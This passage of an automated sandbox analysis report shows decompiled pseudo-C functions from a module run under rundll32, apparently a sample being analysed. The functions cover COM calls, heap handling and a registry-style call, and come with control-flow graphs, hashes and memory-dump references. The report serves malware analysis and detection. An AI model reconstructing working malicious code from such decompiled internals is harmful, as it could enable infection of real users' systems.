                                                                                                                                                                                                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                    									_t50 = _a4;
                                                                                                                                                                                                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t45 = _a4;
                                                                                                                                                                                                                                    						if(_t45 != 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t57 = __imp__#6; // 0x7414d5b0
                                                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a20);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a12);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t41 = _v8;
                                                                                                                                                                                                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E04C373FD(void* __edx) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t50 = __edx;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t23 = E04C3A72D(0,  &_v8); // executed
                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t24 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t4 = _t24 + 0x4c3ede0; // 0x6c69388
                                                                                                                                                                                                                                    				_t5 = _t24 + 0x4c3ed88; // 0x4f0053
                                                                                                                                                                                                                                    				_t26 = E04C31262( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                    				_t45 = _t26;
                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                    					 *0x4c3d0f4(_v16, 0,  &_v12);
                                                                                                                                                                                                                                    					_t52 = __imp__; // 0x76d25520
                                                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    						_t11 = _t32 + 0x4c3edd4; // 0x6c6937c
                                                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                                                    						_t12 = _t32 + 0x4c3ed88; // 0x4f0053
                                                                                                                                                                                                                                    						_t55 = E04C37CB8(_t11, _t12, _t11);
                                                                                                                                                                                                                                    						_t59 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							_t35 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    							_t13 = _t35 + 0x4c3ee1e; // 0x30314549
                                                                                                                                                                                                                                    							_t37 = E04C389D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14); // executed
                                                                                                                                                                                                                                    							if(_t37 == 0) {
                                                                                                                                                                                                                                    								_t61 =  *0x4c3d25c - 6;
                                                                                                                                                                                                                                    								if( *0x4c3d25c <= 6) {
                                                                                                                                                                                                                                    									_t42 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    									_t15 = _t42 + 0x4c3ec2a; // 0x52384549
                                                                                                                                                                                                                                    									E04C389D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t38 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    							_t17 = _t38 + 0x4c3ee18; // 0x6c693c0
                                                                                                                                                                                                                                    							_t18 = _t38 + 0x4c3edf0; // 0x680043
                                                                                                                                                                                                                                    							_t40 = E04C32659(_v8, 0x80000001, _t55, _t18, _t17);
                                                                                                                                                                                                                                    							_t45 = _t40;
                                                                                                                                                                                                                                    							 *_t52( *0x4c3d238, 0, _t55);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_t52( *0x4c3d238, 0, _v16);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t54 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					E04C31F99(_t54);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6ed4306fa152e8d6b1574dd890a9a572cc295771f9aeff849bc01777de912ab5
                                                                                                                                                                                                                                    • Instruction ID: 0fd2fd2a9c3fe9e00878c4bb461d9352341763de12b3c7c996ad100e42f7b950
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed4306fa152e8d6b1574dd890a9a572cc295771f9aeff849bc01777de912ab5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 533181B5901108BFEB11DBA0DC84EAA7BBDEF44706F158055B601A7161D775FE04EF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 500 4c37b5d-4c37b91 502 4c37b93-4c37b96 500->502 503 4c37c0b-4c37c11 500->503 504 4c37bb3-4c37bcd 502->504 505 4c37b98-4c37bb0 call 4c3908b 502->505 509 4c37bf8-4c37bfa 504->509 510 4c37bcf-4c37bd9 504->510 505->504 511 4c37c02-4c37c07 509->511 512 4c37bfc-4c37bfe 509->512 513 4c37be2-4c37be9 510->513 511->503 512->511 514 4c37bf2-4c37bf4 513->514 515 4c37beb-4c37bf0 513->515 514->509 515->509
                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                    			E04C37B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t22 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t2 = _t22 + 0x4c3e0dc; // 0x6c68684
                                                                                                                                                                                                                                    				_t3 = _t22 + 0x4c3e0cc; // 0x4590f811
                                                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t24 =  *0x4c3d15c(_t3, 0, 1, _t2,  &_v16); // executed
                                                                                                                                                                                                                                    				_t46 = _t24;
                                                                                                                                                                                                                                    				if(_t46 >= 0) {
                                                                                                                                                                                                                                    					if(_a8 != 0) {
                                                                                                                                                                                                                                    						_t36 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    						_t8 = _t36 + 0x4c3e3b8; // 0x5f005f
                                                                                                                                                                                                                                    						E04C3908B(_t8, _a8,  &_v12);
                                                                                                                                                                                                                                    						_t39 = _v12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t26 = _v16;
                                                                                                                                                                                                                                    					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
                                                                                                                                                                                                                                    					if(_t46 >= 0) {
                                                                                                                                                                                                                                    						_t32 =  *0x4c3d158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
                                                                                                                                                                                                                                    						_t46 = _t32;
                                                                                                                                                                                                                                    						_t33 = _v8;
                                                                                                                                                                                                                                    						if(_t46 < 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t33 + 8))(_t33);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a12 = _t33;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t39 != 0) {
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t28 = _v16;
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
• Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 516 4c383b7-4c38406 518 4c38479-4c3847e 516->518 519 4c38408-4c38419 516->519 521 4c38470 519->521 522 4c3841b-4c3843b call 4c32049 519->522 521->518 526 4c38466 522->526 527 4c3843d-4c38447 522->527 529 4c3846f 526->529 528 4c3844c-4c3844e 527->528 530 4c38460-4c38461 call 4c39039 528->530 531 4c38450-4c3845f call 4c35544 528->531 529->521 530->526 531->530
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 535 4c343df-4c343ef call 4c32049 538 4c34495-4c34498 535->538 539 4c343f5-4c3440c 535->539 540 4c3449d-4c3449f 538->540 541 4c34413-4c34418 539->541 542 4c3448a-4c34493 call 4c39039 541->542 543 4c3441a-4c3443d 541->543 542->540 547 4c3443f-4c34458 543->547 548 4c3447e 543->548 551 4c34472-4c3447c 547->551 552 4c3445a-4c34470 547->552 550 4c34482-4c34488 548->550 550->542 553 4c3449a 550->553 551->548 552->550 553->540
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E04C343DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                    				intOrPtr* _t51;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t51 = E04C32049(_t19, 0xc);
                                                                                                                                                                                                                                    				if(_t51 == 0) {
                                                                                                                                                                                                                                    					_t21 = 8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t22 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    					_t1 = _t22 + 0x4c3e058; // 0x6c68600
                                                                                                                                                                                                                                    					_t2 = _t22 + 0x4c3e028; // 0x2df01
                                                                                                                                                                                                                                    					_t24 =  *0x4c3d15c(_t2, 0, 4, _t1, _t51); // executed
                                                                                                                                                                                                                                    					_v8 = _t24;
                                                                                                                                                                                                                                    					if(_t24 < 0) {
                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                    						E04C39039(_t24, _t51);
                                                                                                                                                                                                                                    						_t21 = _v8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t43 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    						_t26 =  *_t51;
                                                                                                                                                                                                                                    						_t4 = _t51 + 4; // 0x4
                                                                                                                                                                                                                                    						_t35 = _t4;
                                                                                                                                                                                                                                    						_t5 = _t43 + 0x4c3e048; // 0xd30c1661
                                                                                                                                                                                                                                    						_t27 =  *((intOrPtr*)( *_t26))(_t26, _t5, _t35, __edi, __ebx);
                                                                                                                                                                                                                                    						_v8 = _t27;
                                                                                                                                                                                                                                    						_t28 =  *_t51;
                                                                                                                                                                                                                                    						_t40 =  *_t28;
                                                                                                                                                                                                                                    						if(_t27 < 0) {
                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                    							_t24 =  *((intOrPtr*)(_t40 + 8))(_t28);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t45 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    							_t7 = _t51 + 8; // 0x8
                                                                                                                                                                                                                                    							_t49 = _t7;
                                                                                                                                                                                                                                    							_t8 = _t45 + 0x4c3e068; // 0x2df05
                                                                                                                                                                                                                                    							_t29 =  *_t40(_t28, _t8, _t49);
                                                                                                                                                                                                                                    							_v8 = _t29;
                                                                                                                                                                                                                                    							if(_t29 < 0) {
                                                                                                                                                                                                                                    								_t30 =  *_t35;
                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t30 + 8))(_t30);
                                                                                                                                                                                                                                    								_t28 =  *_t51;
                                                                                                                                                                                                                                    								_t40 =  *_t28;
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t32 =  *_t49;
                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
                                                                                                                                                                                                                                    								_t24 = _a4;
                                                                                                                                                                                                                                    								_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                                    								 *_a4 = _t51;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_v8 >= 0) {
                                                                                                                                                                                                                                    							_t21 = _a4;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t21;
                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 49c56717f76b4dade9e95c8f54e43a95601c6e095e0c1a0625ceeae78de3688a
                                                                                                                                                                                                                                    • Instruction ID: bcab6922f367cf011ac5f1615e8955477d178c04546e460222ad7b97cfabaad5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49c56717f76b4dade9e95c8f54e43a95601c6e095e0c1a0625ceeae78de3688a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 652148B5600204EFE714CFA4C888F9A77B9EF8970AF108568F646CB250D775EE05DBA4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 556 4c31a70-4c31a84 557 4c31a89-4c31a8e 556->557 558 4c31b25-4c31b2c 557->558 559 4c31a94-4c31a97 557->559 560 4c31ab1-4c31ab4 559->560 561 4c31a99-4c31aae 559->561 560->558 562 4c31ab6-4c31abb 560->562 561->560 563 4c31b18-4c31b23 562->563 564 4c31abd-4c31acf 562->564 563->558 568 4c31ad1-4c31ade 564->568 569 4c31b0f-4c31b14 564->569 568->569 571 4c31ae0-4c31aee call 4c32049 568->571 569->563 574 4c31af0-4c31afd call 4c35544 571->574 575 4c31aff 571->575 577 4c31b06 574->577 575->577 577->569
                                                                                                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                                                                                                    			E04C31A70(intOrPtr* __eax, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                                                                                    				_t44 = 0; // executed
                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                    				_v8 = _t26;
                                                                                                                                                                                                                                    				if(_t26 < 0) {
                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                    					__imp__(0xc8);
                                                                                                                                                                                                                                    					_push( &_v12);
                                                                                                                                                                                                                                    					_push(__eax);
                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v8 >= _t37) {
                                                                                                                                                                                                                                    					_t28 = _v12;
                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                    						_v8 = _t31;
                                                                                                                                                                                                                                    						if(_t31 >= 0) {
                                                                                                                                                                                                                                    							__imp__(_v16);
                                                                                                                                                                                                                                    							_t44 = _t31;
                                                                                                                                                                                                                                    							if(_t44 != 0) {
                                                                                                                                                                                                                                    								_t44 = _t44 + 1;
                                                                                                                                                                                                                                    								_t46 = _t44 + _t44;
                                                                                                                                                                                                                                    								_t37 = E04C32049(_t31, _t46);
                                                                                                                                                                                                                                    								if(_t37 == 0) {
                                                                                                                                                                                                                                    									_v8 = 0x8007000e;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_push(_t46);
                                                                                                                                                                                                                                    									_push(_v16);
                                                                                                                                                                                                                                    									_push(_t37);
                                                                                                                                                                                                                                    									L04C35544();
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__imp__#6(_v16);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t32 = _v12;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_a4 = _t37;
                                                                                                                                                                                                                                    					 *_a8 = _t44 + _t44;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 09791f304d7596d1070e2cad5a2244039275363d6dd2a96b50b4efcd88540ca5
                                                                                                                                                                                                                                    • Instruction ID: 35a204ed0099e852b3923d2ae74c019859523b6a621f755931003f073a559f18
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09791f304d7596d1070e2cad5a2244039275363d6dd2a96b50b4efcd88540ca5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9215675A00209FFDB10DFA4D884DDEBBB5FF49316B1441A9E905E7210EB30EA45DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C38504(void* __eax, void* __ecx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                                                    				char _t38;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t40 =  *0x4c3d340; // 0x6c68d39
                                                                                                                                                                                                                                    				_push(0x800);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( *0x4c3d238);
                                                                                                                                                                                                                                    				if( *0x4c3d24c >= 5) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					if(__eax == 0) {
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						_t28 = 8;
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						if(_t28 != 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							 *0x4c3d24c =  *0x4c3d24c + 1;
                                                                                                                                                                                                                                    							L11:
                                                                                                                                                                                                                                    							return _t28;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                                                    						_t38 = _v8;
                                                                                                                                                                                                                                    						 *_a16 = _a4;
                                                                                                                                                                                                                                    						 *_a20 = E04C32496(_a4, _t38); // executed
                                                                                                                                                                                                                                    						_t18 = E04C3A66E(_t35, _t38, _t42); // executed
                                                                                                                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                                                                                                                    							 *_a8 = _t38;
                                                                                                                                                                                                                                    							 *_a12 = _t18;
                                                                                                                                                                                                                                    							if( *0x4c3d24c < 5) {
                                                                                                                                                                                                                                    								 *0x4c3d24c =  *0x4c3d24c & 0x00000000;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t28 = 0xbf;
                                                                                                                                                                                                                                    						E04C3A1B0();
                                                                                                                                                                                                                                    						__imp__( *0x4c3d238, 0, _t38); // executed
                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                    					}
